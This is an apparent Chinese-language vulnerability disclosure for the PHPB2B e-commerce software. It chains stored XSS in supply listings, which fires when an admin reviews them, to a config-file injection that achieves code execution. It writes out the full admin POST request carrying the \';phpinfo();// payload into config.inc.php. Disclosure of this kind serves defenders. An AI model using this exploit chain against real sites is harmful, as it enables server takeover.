PHPB2B存储xss+getshell

文章目录

漏洞作者: darker

PHPB2B 存在多处xss。
可盲打后台且getshell。
官方最新版本. https://github.com/ulinke/phpb2b/archive/master.zip

详细说明:

ex:

发布供求信息

2503292064ea77aad6bbad57a360a8e1ffaaf50e[1]

 

管理后台审核供求信息:

25033143090245d1dbda7e2a40e54f01e5f8ce4b[1]

 
执行post操作

data[Bsetting][site_url] 存在configs/config.inc.php中。

修改site_url为\\’;phpinfo();//

pkav.post(“http://localhost/phpb2b/pb-admin/setting.php?do=basic”,”data%5Bsetting%5D%5Bsite_name%5D=%E5%8F%8B%E9%82%BBB2B%E8%A1%8C%E4%B8%9A%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E7%BD%91%E7%AB%99%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F&data%5Bsetting%5D%5Bsite_title%5D=%E5%8F%8B%E9%82%BBB2B%E8%A1%8C%E4%B8%9A%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E7%BD%91+-+Powered+By+PHPB2B&data%5Bsetting%5D%5Bsite_banner_word%5D=%E6%9C%80%E4%B8%93%E4%B8%9A%E7%9A%84%E8%A1%8C%E4%B8%9A%E7%94%B5%E5%AD%90%E5%95%86%E5%8A%A1%E7%BD%91%E7%AB%99&data%5Bsetting%5D%5Bsite_logo%5D=static%2Fimages%2Flogo.jpg&data%5Bsetting%5D%5Bsite_url%5D=\\’;phpinfo();//%2F&data%5Bsetting%5D%5Bicp_number%5D=ICP%E5%A4%87%E6%A1%88%E5%8F%B7%E7%A0%81&savebasic=%E6%8F%90%E4%BA%A4″,function(rs){});

成功写入configs/config.inc.php

漏洞证明:

写入配置文件

25033413d34213c5153725c75ce1b0c1bba03b04[1]

 

成功执行:

250335013994f9203554fa068c71887b31c0829d[1]

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录